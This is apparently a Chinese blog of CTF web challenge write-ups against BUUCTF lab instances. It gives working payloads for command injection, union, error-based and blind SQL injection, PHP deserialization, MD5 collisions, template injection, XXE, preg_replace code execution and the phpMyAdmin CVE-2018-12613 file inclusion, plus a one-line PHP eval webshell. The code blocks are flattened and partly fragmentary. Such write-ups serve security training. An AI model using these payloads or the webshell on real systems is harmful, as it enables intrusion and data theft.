本文最后更新于 2025年3月8日 晚上
f12看源码
看源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 <?php highlight_file (__FILE__ );class emmm {public static function checkFile (&$page ) {$whitelist = ["source" =>"source.php" ,"hint" =>"hint.php" ];if (! isset ($page ) || !is_string ($page )) {echo "you can't see it" ;return false ;if (in_array ($page , $whitelist )) {return true ;$_page = mb_substr ($page ,0 ,mb_strpos ($page . '?' , '?' )if (in_array ($_page , $whitelist )) {return true ;$_page = urldecode ($page );$_page = mb_substr ($_page ,0 ,mb_strpos ($_page . '?' , '?' )if (in_array ($_page , $whitelist )) {return true ;echo "you can't see it" ;return false ;if (! empty ($_REQUEST ['file' ])is_string ($_REQUEST ['file' ])checkFile ($_REQUEST ['file' ])include $_REQUEST ['file' ];exit ;else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />" ;?>
hint.php
1 flag not here, and flag in ffffllllaaaagggg
1 /source.php?file=source.php?/../../../../ffffllllaaaagggg
1 /?file=php://filter/convert.base64-encode/resource=flag.php
这里主要考察的是分析黑盒过滤了什么从而正常读
1 ?ip=127.0.0.1|tac $IFS$9index .php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 /?ip=
1 ?ip=127.0.0.1;a=ag;b=fl;cat $IFS$1$b$a .php
利用base64和sh进行读取
1 /?ip=1;echo $IFS$1Y2F0IGZsYWcucGhw |base64 $IFS$1 -d|sh
内联执行
堆叠注入(我已经有些忘了),先进行查库
看的wp这里是
1 select $_POST['query' ] || flag from flag
原理是构成了语句是
1 select * ,1 || flag from flag
实际上是执行
PIPES_AS_CONCAT 是 MySQL 的一个 SQL 模式选项。启用后,|| 会被解释为字符串连接符,而不是逻辑 OR 运算符。
1 SET sql_mode = 'PIPES_AS_CONCAT' ;
所以
1 1 ;set sql_mode= PIPES_AS_CONCAT;select 1
类似就是
1 select set sql_mode= PIPES_AS_CONCAT;select 1 ,flag from flag
登入得到
1 Your password is '220b8cd38492347b73e6d47a623dcd9a'
没啥用继续查
测出三列
回显是
1 2 3 Hello 2 !password is '3'
1 1 'union select 1,databae(),3#
1 1 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="geek"#
1 1 'union select 1,group_concat(column_name),3 from information_schema.columns where table_name="l0ve1ysq1"#
1 1 'union select 1,group_concat(password),3 from l0ve1ysq1#
最后查看flag
先尝试
输入select
1 return preg_match ("/select|update|delete|drop|insert|where|\./i" ,$inject );
大概是堆叠注入吧
这里我更倾向于先fuzz一下
1 2 3 4 5 6 7 8 9 array(1 ) { [ 0 ] =>16 ) "1919810931114514" } 1 ) { [ 0 ] =>5 ) "words" }
1 1 ';show columns from `words `
1 1 ';show columns from `1919810931114514 `
里面有flag,接下来是三种思路
换表
1 1 ';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT ' 12 ';ALTER TABLE words CHANGE flag data VARCHAR(100);#
1 1 ';show columns from `words`#
利用本来就存在的查询方法帮我们进行查询
利用预处理的方法进行构造,select * from `1919810931114514`进行16进制编码(环境好像有问题没打通,原理是这样的)
1 1 ;SET @a = 0x73656c656374202a2066726f6d20603139313938313039333131313435313460 ;prepare execsql from @a ;execute execsql;#
利用handler打开查询,也是一个常见的手法
1 1 ';HANDLER `1919810931114514` OPEN;HANDLER `1919810931114514` READ FIRST;HANDLER `1919810931114514` CLOSE;#
看源码
/Archive_room.php
再看
/action.php
1 2 3 4 5 6 7 <!DOCTYPE html > <html > </html >
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <html>
1 /secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
看源码/Secret.php
1 2 3 Referer https://Sycsecret.buuoj.cn127.0.0.1
1 <script language="php">@eval($_POST[sb])</script>
写入图片马,bp抓包拦截改phtml,然后蚁剑连上就行
post发包
参考上面的极客大挑战,我直接做法一致
不能直接登录,bp来fuzz一下吧
主要分为三种,error和nopassword和input
应该是过滤了select和union,还有一些过滤自己测
1 1 ’ununionion seselectlect 1 ,2 ,3 #
1 1 % 27 ununionion% 20 seselectlect% 201 ,2 ,3 % 23
1 1 % 27 ununionion% 20 seselectlect% 201 ,database(),3 % 23
1 1 % 27 % 20 ununionion% 20 seselectlect% 201 ,2 ,group_concat(table_name)% 20 frfromom% 20 infoorrmation_schema.tables% 20 whwhereere% 20 table_schema= % 27 geek% 27 % 23
1 1 % 27 % 20 ununionion% 20 seselectlect% 201 ,2 ,group_concat(column_name)% 20 frfromom% 20 infoorrmation_schema.columns% 20 whwhereere% 20 table_schema= % 27 b4bsql% 27 % 23
发现没找到,直接放最后一步吧,慢慢找
1 1 % 27 % 20 ununionion% 20 seselectlect% 201 ,2 ,group_concat(flag)% 20 frfromom% 20 ctf.Flag% 23
过程都是一样的,弄清过滤什么就行
访问/www.zip
看class.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 <?php include 'flag.php' ;error_reporting (0 );class Name private $username = 'nonono' ;private $password = 'yesyes' ;public function __construct ($username ,$password $this ->username = $username ;$this ->password = $password ;function __wakeup ($this ->username = 'guest' ;function __destruct (if ($this ->password != 100 ) {echo "</br>NO!!!hacker!!!</br>" ;echo "You name is: " ;echo $this ->username;echo "</br>" ;echo "You password is: " ;echo $this ->password;echo "</br>" ;die ();if ($this ->username === 'admin' ) {global $flag ;echo $flag ;else {echo "</br>hello my friend~~</br>sorry i can't give you the flag!" ;die ();?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php class Name private $username = 'nonono' ;private $password = 'yesyes' ;public function __construct ($username , $password $this ->username = $username ;$this ->password = $password ;$obj = new Name ('admin' , 100 );echo serialize ($obj );?>
1 /index.php?select =O:4:"Name" :3:{s:14:"%00Name%00username" ;s:5:"admin" ;s:14:"%00Name%00password" ;i:100;}
dir找到
1 [15:27:32] 200 - 347 B - /index.php .bak
下载后
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?php include_once "flag.php" ;if (isset ($_GET ['key' ])) {$key = $_GET ['key' ];if (!is_numeric ($key )) {exit ("Just num!" );$key = intval ($key );$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3" ;if ($key == $str ) {echo $flag ;else {echo "Try to find out source file!" ;
看一下源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $('#calc').submit(function(){<div class ="alert alert-success" > <strong > 答案:</strong > ${data}</div > `);
看一下源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php error_reporting (0 );if (!isset ($_GET ['num' ])){show_source (__FILE__ );else {$str = $_GET ['num' ];$blacklist = [' ' , '\t' , '\r' , '\n' ,'\'' , '"' , '`' , '\[' , '\]' ,'\$' ,'\\' ,'\^' ];foreach ($blacklist as $blackitem ) {if (preg_match ('/' . $blackitem . '/m' , $str )) {die ("what are you want to do?" );eval ('echo ' .$str .';' );?>
1 /calc.php? num=1;var_dump(scandir(chr(47)));
读取当前目录的内容找到flag
1 /calc.php? num=1;var_dump(include(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));
考察的偏函数绕过吧
1 2 3 4 5 6 7 8 9 10 11 <!--
1 2 money[]=100000000&password=404abc
前端一般直接找不到的话抓包看看
1 select * from 'admin' where password= md5($pass,true )
利用sql特性的md5的字符串ffifdyop,进入下一层
1 2 3 4 5 6 7 8 $a = $GET ['a' ];$b = $_GET ['b' ];if ($a != $b && md5 ($a ) == md5 ($b )){
1 2 3 4 5 6 7 8 9 <?php error_reporting (0 );include "flag.php" ;highlight_file (__FILE__ );if ($_POST ['param1' ]!==$_POST ['param2' ]&&md5 ($_POST ['param1' ])===md5 ($_POST ['param2' ])){echo $flag ;
1 param1=psycho%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00W%ADZ%AF%3C%8A%13V%B5%96%18m%A5%EA2%81_%FB%D9%24%22%2F%8F%D4D%A27vX%B8%08%D7m%2C%E0%D4LR%D7%FBo%10t%19%02%82%7D%7B%2B%9Bt%05%FFl%AE%8DE%F4%1F%84%3C%AE%01%0F%9B%12%D4%81%A5J%F9H%0FyE%2A%DC%2B%B1%B4%0F%DEcC%40%DA29%8B%C3%00%7F%8B_h%C6%D3%8Bd8%AF%85%7C%14w%06%C2%3AC%BC%0C%1B%FD%BB%98%CE%16%CE%B7%B6%3A%F3%99%B59%F9%FF%C2¶m2=psycho%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00W%ADZ%AF%3C%8A%13V%B5%96%18m%A5%EA2%81_%FB%D9%A4%22%2F%8F%D4D%A27vX%B8%08%D7m%2C%E0%D4LR%D7%FBo%10t%19%02%02%7E%7B%2B%9Bt%05%FFl%AE%8DE%F4%1F%04%3C%AE%01%0F%9B%12%D4%81%A5J%F9H%0FyE%2A%DC%2B%B1%B4%0F%DEc%C3%40%DA29%8B%C3%00%7F%8B_h%C6%D3%8Bd8%AF%85%7C%14w%06%C2%3AC%3C%0C%1B%FD%BB%98%CE%16%CE%B7%B6%3A%F3%9959%F9%FF%C2
弱密码
先随便注册一个账户,然后change password,看源码可以找到
现在已经没了,源码丢失不方便写,应该就是正常的cookie污染
unicode进行解题
unicode伪造admin进行登入改密码然后再进入进行伪造
利用.htaccess伪造图片马传入,蚁剑连
hints.txt内容
1 md5 (cookie_secret +md5 (filename ))
1 md5 (cookie_secret +md5 (fllllllllllllag ))
如题是模板注入
1 /error?msg={{handler.settings}}
得到
1 {'autoreload' : True , 'compiled_template_cache' : False , 'cookie_secret' : '11e71ec2-6ea2-47d0-b195-23bca3c02b8f' }
1 2 3 4 5 6 7 8 import hashlib"/fllllllllllllag" "11e71ec2-6ea2-47d0-b195-23bca3c02b8f" print (outer_md5)
1 /file?filename=/fllllllllllllag&filehash=bd9d4433dc3382c948d7dbc0a2a4ee79
这里的疑点是为什么用msg这个注入点,网上好像没有解析。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php $text = $_GET ["text" ];$file = $_GET ["file" ];$password = $_GET ["password" ];if (isset ($text )&&(file_get_contents ($text ,'r' )==="welcome to the zjctf" )){echo "<br><h1>" .file_get_contents ($text ,'r' )."</h1></br>" ;if (preg_match ("/flag/" ,$file )){echo "Not now!" ;exit (); else {include ($file ); $password = unserialize ($password );echo $password ;else {highlight_file (__FILE__ );?>
1 ?text =data://text /plain,welcome to the zjctf&file=php://filter /read =convert.base64-encode/resource=useless.php
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php class Flag public $file ; public function __tostring (if (isset ($this ->file)){ echo file_get_contents ($this ->file); echo "<br>" ;return ("U R SO CLOSE !///COME ON PLZ" );?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php class Flag public $file ;public function __tostring (if (isset ($this ->file)){echo file_get_contents ($this ->file);echo "<br>" ;return ("U R SO CLOSE !///COME ON PLZ" );$exp =new Flag ();$exp ->file='flag.php' ;echo serialize ($exp );
1 ?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag" :1:{s:4:"file" ;s:8:"flag.php" ;};
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 for youinclude 'flag.php' ;$flag ='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}' ;if (isset ($_GET ['gg' ])&&isset ($_GET ['id' ])) {$id =$_GET ['id' ];$gg =$_GET ['gg' ];if (md5 ($id ) === md5 ($gg ) && $id !== $gg ) {echo 'You got the first step' ;if (isset ($_POST ['passwd' ])) {$passwd =$_POST ['passwd' ];if (!is_numeric ($passwd ))if ($passwd ==1234567 )echo 'Good Job!' ;highlight_file ('flag.php' );die ('By Retr_0' );else echo "can you think twice??" ;else {echo 'You can not get it !' ;else {die ('only one way to get the flag' );else {echo "You are not a real hacker!" ;else {die ('Please input first' );
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /?id =psycho%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00W%ADZ%AF%3C%8A%13V%B5%96%18m%A5%EA2%81_%FB%D9%24%22%2F%8F%D4D%A27vX%B8%08%D7m%2C%E0%D4LR%D7%FBo%10t%19%02%82%7D%7B%2B%9Bt%05%FFl%AE%8DE%F4%1F%84%3C%AE%01%0F%9B%12%D4%81%A5J%F9H%0FyE%2A%DC%2B%B1%B4%0F%DEcC%40%DA29%8B%C3%00%7F%8B_h%C6%D3%8Bd8%AF%85%7C%14w%06%C2%3AC%BC%0C%1B%FD%BB%98%CE%16%CE%B7%B6%3A%F3%99%B59%F9%FF%C2&gg=psycho%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00W%ADZ%AF%3C%8A%13V%B5%96%18m%A5%EA2%81_%FB%D9%A4%22%2F%8F%D4D%A27vX%B8%08%D7m%2C%E0%D4LR%D7%FBo%10t%19%02%02%7E%7B%2B%9Bt%05%FFl%AE%8DE%F4%1F%04%3C%AE%01%0F%9B%12%D4%81%A5J%F9H%0FyE%2A%DC%2B%B1%B4%0F%DEc%C3%40%DA29%8B%C3%00%7F%8B_h%C6%D3%8Bd8%AF%85%7C%14w%06%C2%3AC%3C%0C%1B%FD%BB%98%CE%16%CE%B7%B6%3A%F3%9959%F9%FF%C2 HTTP/1.1id =240610708&gg=QNKCDZO
利用报错注入
1 1 'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
1 1 'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(' geek')),0x7e),1))#
1 1 'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(' H4rDsq1')),0x7e),1))#
1 1 'or(updatexml(1,concat(0x7e,(select(group_concat(id,' ~ ',username,' ~ ',password))from(H4rDsq1)),0x7e),1))#
拿到一半的flag
1 1 'or(updatexml(1,concat(0x7e,(select(right(password,35))from(H4rDsq1)),0x7e),1))#
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 <?php include ("flag.php" );highlight_file (__FILE__ );class FileHandler protected $op ;protected $filename ;protected $content ;function __construct ($op = "1" ;$filename = "/tmp/tmpfile" ;$content = "Hello World!" ;$this ->process ();public function process (if ($this ->op == "1" ) {$this ->write ();else if ($this ->op == "2" ) {$res = $this ->read ();$this ->output ($res );else {$this ->output ("Bad Hacker!" );private function write (if (isset ($this ->filename) && isset ($this ->content)) {if (strlen ((string )$this ->content) > 100 ) {$this ->output ("Too long!" );die ();$res = file_put_contents ($this ->filename, $this ->content);if ($res ) $this ->output ("Successful!" );else $this ->output ("Failed!" );else {$this ->output ("Failed!" );private function read ($res = "" ;if (isset ($this ->filename)) {$res = file_get_contents ($this ->filename);return $res ;private function output ($s echo "[Result]: <br>" ;echo $s ;function __destruct (if ($this ->op === "2" )$this ->op = "1" ;$this ->content = "" ;$this ->process ();function is_valid ($s for ($i = 0 ; $i < strlen ($s ); $i ++)if (!(ord ($s [$i ]) >= 32 && ord ($s [$i ]) <= 125 ))return false ;return true ;if (isset ($_GET {'str' })) {$str = (string )$_GET ['str' ];if (is_valid ($str )) {$obj = unserialize ($str );
只要跟进read函数是怎么执行就行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php class FileHandler public $op =2 ;public $filename ="php://filter/read=convert.base64-encode/resource=flag.php" ;public $content ;$exp =new FileHandler ();$exp =serialize ($exp );echo $exp ;
1 ?str=O:11:"FileHandler" :3:{S:5:"\00\2A\00op" ;i:2;S:11:"\00\2A\00filename" ;S:8:"flag.php" ;S:10:"\00\2A\00content" ;S:0:"" ;}
测了一下png头也过滤了改个jpeg
1 2 3 <FilesMatch "shell.jpg">
1 /upload/172f639b4017aae3ca276bdbf023400a/shell.jpg
用蚁剑连一下就行
.user.ini的马上传,注意加gif89,然后蚁剑连就行
1 2 3 < ! select * from user where username = '$name'
1 name =1 ' union select 1 ,2 ,3 #&pw=132
源码里有
1 2 3 4 5 6 7 8 9 if ($arr [1 ] == "admin" ){if (md5 ($password ) == $arr [2 ]){echo $flag ;else {die ("wrong pass!" );
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /search.php HTTP/1.1' union select 1,' admin',' e10adc3949ba59abbe56e057f20f883e'#&pw=123456
仿的随便注,没细看直接handler看
1 1 ';HANDLER `FlagHere` OPEN;HANDLER `FlagHere` READ FIRST;HANDLER `FlagHere` CLOSE;#
测一下有waf,前端测一会bp看一下waf写脚本。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import requestsimport stringdef blind_injection (url ):'' for position in range (1 , 60 ):for char in printable_chars:'(select(ascii(mid(flag,{0},1))={1})from(flag))' .format (position, ord (char))"id" : payload}try :if 'Hello' in res.text:print (f"Flag so far: {flag} " )break except requests.RequestException as e:print (f"Error: {e} " )continue print (f"Final flag: {flag} " )if __name__ == '__main__' :'http://183220b5-e8ae-4f31-a048-8e409f5ea1b3.node5.buuoj.cn:81/index.php'
脚本还是要练的。
WEB-INF是java的WEB应用的安全目录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 1.WEB-INF/web.xml
WEB-INF/web.xml 是 Java Web 应用程序中的一个重要配置文件,通常用于定义 Servlet、过滤器、监听器、上下文参数等。它位于 WEB-INF 目录下,是 Java EE(现 Jakarta EE)应用程序的标准部署描述文件。
我们在点help可以读取文件内容,但是get传参不行, 用post发包
1 2 3 4 5 6 7 8 9 10 11 12 13 POST /Download HTTP/1 .1 Host : a349ce3f-344 c-4 e08-8542 -f70cdd3d18bc.node5.buuoj.cn:81 Accept -Encoding: gzip, deflateAccept -Language: zh-CN,zh;q=0 .9 ,en;q=0 .8 ,en-GB;q=0 .7 ,en-US;q=0 .6 Cookie : JSESSIONID=A74D21610CC84D499908238CC3027647Upgrade -Insecure-Requests: 1 Accept : text/html,application/xhtml+xml,application/xml;q=0 .9 ,image/avif,image/webp,image/apng,*/*;q=0 .8 ,application/signed-exchange;v=b3;q=0 .7 referer : http://a349ce3f-344 c-4 e08-8542 -f70cdd3d18bc.node5.buuoj.cn:81 /LoginUser -Agent: Mozilla/5 .0 (Windows NT 10 .0 ; Win64; x64) AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537 .36 Edg/133.0.0.0 Content -Type: application/x-www-form-urlencodedContent -Length: 24 filename =WEB-INF/web.xml
得到
1 2 3 4 5 6 7 8 <servlet > <servlet-name > FlagController</servlet-name > <servlet-class > com.wm.ctf.FlagController</servlet-class > </servlet > <servlet-mapping > <servlet-name > FlagController</servlet-name > <url-pattern > /Flag</url-pattern > </servlet-mapping >
尝试读取
1 filename=WEB-INF/classes/ com/wm/ ctf/FlagController.class
1 <ZmxhZ3s2ZGQyYmI3Ni00ZTlkLTQxODEtODljMC1hZTFlYTBiN2Y4ZDJ9Cg=
解密就行
前端没东西,尝试看一下
1 2 3 http ://93707 d85-3 eb1-4 fce-b716-6 b619443f821.node5.buuoj.cn:81 /robots.txtUser -agent: *Disallow : /user.php.bak
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 <?php class UserInfo public $name = "" ;public $age = 0 ;public $blog = "" ;public function __construct ($name , $age , $blog {$this ->name = $name ;$this ->age = (int )$age ;$this ->blog = $blog ;function get ($url {$ch = curl_init ();curl_setopt ($ch , CURLOPT_URL, $url );curl_setopt ($ch , CURLOPT_RETURNTRANSFER, 1 );$output = curl_exec ($ch );$httpCode = curl_getinfo ($ch , CURLINFO_HTTP_CODE);if ($httpCode == 404 ) {return 404 ;curl_close ($ch );return $output ;public function getBlogContents ( {return $this ->get ($this ->blog);public function isValidBlog ( {$blog = $this ->blog;return preg_match ("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i" , $blog );
URL 请求的 URL 未经过滤或验证,可能导致 SSRF(服务器端请求伪造)漏洞。
发现有sql注入
1 2 3 ?no = 1 and 1 = 1 no = 1 order by 5 no = 1 order by 4
1 ?no = -1 Union Select 1 ,2 ,3 ,4
1 ?no =-1 Union Select 1 ,database (),3 ,4
1 ?no = -1 Union Select 1 ,group_concat(table_name),3 ,4 from information_schema.tables where table_schema= database()
1 ?no = -1 Union Select 1 ,group_concat(column_name),3 ,4 from information_schema.columns where table_name= 'users'
1 ?no = -1 Union Select 1 ,data,3 ,4 from users
1 ?no = -1 union select 1 ,2 ,3 ,'O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
得到然后base64解密
可以发现是root用户利用
1 ?no = -1 union select 1 ,load_file("/var/www/html/flag.php"),3 ,4
有点遗忘了,注入也不太符合常规的注入,引号都不需要
1 http://8c9c7563-317a-447e-a45f-9dbb7bb6613c.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index.php
去掉php
然后解密
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php $file = $_GET ['category' ];if (isset ($file ))if ( strpos ( $file , "woofers" ) !== false || strpos ( $file , "meowers" ) !== false || strpos ( $file , "index" )){include ($file . '.php' );else {echo "Sorry, we currently only support woofers and meowers." ;?>
1 http://8c9c7563-317a-447e-a45f-9dbb7bb6613c.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/index/resource=flag
base64解密
抓包看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /index.php HTTP/1 .1 Host : c8d1e70e-ba6e-47 e5-8 eea-1 fb2003db2ff.node5.buuoj.cn:81 Cache -Control: max-age=0 Accept -Language: zh-CN,zh;q=0 .9 ,en;q=0 .8 ,en-GB;q=0 .7 ,en-US;q=0 .6 Upgrade -Insecure-Requests: 1 User -Agent: Mozilla/5 .0 (Windows NT 10 .0 ; Win64; x64) AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537 .36 Edg/133.0.0.0 Origin : http://c8d1e70e-ba6e-47 e5-8 eea-1 fb2003db2ff.node5.buuoj.cn:81 Content -Type: application/x-www-form-urlencodedAccept : text/html,application/xhtml+xml,application/xml;q=0 .9 ,image/avif,image/webp,image/apng,*/*;q=0 .8 ,application/signed-exchange;v=b3;q=0 .7 Referer : http://c8d1e70e-ba6e-47 e5-8 eea-1 fb2003db2ff.node5.buuoj.cn:81 /index.phpAccept -Encoding: gzip, deflateContent -Length: 29 func =date&p=Y-m-d+h%3 Ai%3 As+a
好像过滤了system和include
1 func =file_get_contents&p=php:// filter/convert.base64-encode/ resource=index.php
源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 <?php $disable_fun = array ("exec" ,"shell_exec" ,"system" ,"passthru" ,"proc_open" ,"show_source" ,"phpinfo" ,"popen" ,"dl" ,"eval" ,"proc_terminate" ,"touch" ,"escapeshellcmd" ,"escapeshellarg" ,"assert" ,"substr_replace" ,"call_user_func_array" ,"call_user_func" ,"array_filter" , "array_walk" , "array_map" ,"registregister_shutdown_function" ,"register_tick_function" ,"filter_var" , "filter_var_array" , "uasort" , "uksort" , "array_reduce" ,"array_walk" , "array_walk_recursive" ,"pcntl_exec" ,"fopen" ,"fwrite" ,"file_put_contents" );function gettime ($func , $p $result = call_user_func ($func , $p );$a = gettype ($result );if ($a == "string" ) {return $result ;else {return "" ;}class Test var $p = "Y-m-d h:i:s a" ;var $func = "date" ;function __destruct (if ($this ->func != "" ) {echo gettime ($this ->func, $this ->p);$func = $_REQUEST ["func" ];$p = $_REQUEST ["p" ];if ($func != null ) {$func = strtolower ($func );if (!in_array ($func ,$disable_fun )) {echo gettime ($func , $p );else {die ("Hacker..." );?>
1 func =\system&p=cat /tmp/ flagoefiu4r93
php内的" \ "在做代码执行的时候,会识别特殊字符串。
注意到了__destruct(),那我们如果反序列化一个类,在类里的参数中写上我们要执行的代码和函数,这样的话就会直接调用gettime函数,而不会执行in_array($func,$disable_fun)
1 2 3 4 5 6 7 8 9 <?php class Test var $p = "ls" ;var $func = "system" ;$test = new Test ();$str = serialize ($test );print ($str );?>
1 func=unserialize&p=O:4:"Test" :2:{s:1:"p" ;s:2:"ls" ;s:4:"func" ;s:6:"system" ;}
剩下的思路一致,找flag就行
php的模板注入,利用
1 X-Forwarded-For :{system ('cat /flag' )}
得到flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php error_reporting (0 );$text = $_GET ["text" ];$file = $_GET ["file" ];if (isset ($text )&&(file_get_contents ($text ,'r' )==="I have a dream" )){echo "<br><h1>" .file_get_contents ($text ,'r' )."</h1></br>" ;if (preg_match ("/flag/" ,$file )){die ("Not now!" );include ($file ); else {highlight_file (__FILE__ );?>
1 http://757fdeb5-f4d3-4fdb-90f5-9ddb7a1b9137.node5.buuoj.cn:81/?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php $id = $_GET ['id' ];$_SESSION ['id' ] = $id ;function complex ($re , $str return preg_replace ('/(' . $re . ')/ei' ,'strtolower("\\1")' ,$str foreach ($_GET as $re => $str ) {echo complex ($re , $str ). "\n" ;function getFlag (eval ($_GET ['cmd' ]);
1 /?text =data://text/pain,I have a dream&file =next.php&\S*=${getFlag()}&cmd =system('cat /flag');
参考文章 - 深入研究preg_replace与代码执行 - 先知社区
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php if (isset ($_SERVER ['HTTP_X_FORWARDED_FOR' ])) {$_SERVER ['REMOTE_ADDR' ] = $_SERVER ['HTTP_X_FORWARDED_FOR' ];if (!isset ($_GET ['host' ])) {highlight_file (__FILE__ );else {$host = $_GET ['host' ];$host = escapeshellarg ($host );$host = escapeshellcmd ($host );$sandbox = md5 ("glzjin" . $_SERVER ['REMOTE_ADDR' ]);echo 'you are in sandbox ' .$sandbox ;mkdir ($sandbox );chdir ($sandbox );echo system ("nmap -T5 -sT -Pn --host-timeout 2 -F " .$host );
escapeshellarg()将输入用单引号包裹并转义内部单引号(' → '\'')。escapeshellcmd()转义Shell元字符(如;、|等)。
123
1 http://339d09df-10f8-466c-a64e-35756b919004.node5.buuoj.cn:81/?host=' <?php echo `cat /flag`;?> -oG test.php '
1 e6305cd14dbe6e1fc4041d81cb3fc9ee/test.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 <?php include "flag.php" ;echo "flag在哪里呢?<br>" ;if (isset ($_GET ['exp' ]))if (!preg_match ('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i' , $_GET ['exp' ]))if (';' === preg_replace ('/[a-z,_]+\((?R)?\)/' , NULL , $_GET ['exp' ]))if (!preg_match ('/et|na|info|dec|bin|hex|oct|pi|log/i' , $_GET ['exp' ]))eval ($_GET ['exp' ]);else die ("还差一点哦!" );else die ("再好好想想!" );else die ("还想读flag,臭弟弟!" );?>
1 ?exp=print_r(scandir(pos(localeconv())));
1 ?exp =show_source(next (array_reverse(scandir(pos (localeconv())))));
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 POST /doLogin.php HTTP/1.1<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag" > ]><creds > <username > &xxe; </username > <password > &xxe; </password > </creds >
看robots.txt
1 2 User-agent : *Disallow : phpinfo.php
1 PHP Version 7 .2 .24 -0 ubuntu0.18.04.1
扫描到存在phpmyadmin数据库管理页面
1 http ://c09e4207-6 d8b-462 c-ab7e-4 c7fa1e59dfc.node5.buuoj.cn:81 /phpmyadmin/index.php
查询到4.8.1版本存在任意文件读取漏洞:[phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)](https://www.abelche.com/2019/11/16/CVE/phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)/)
1 http://c09e4207-6d8b-462c-ab7e-4c7fa1e59dfc.node5.buuoj.cn:81/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
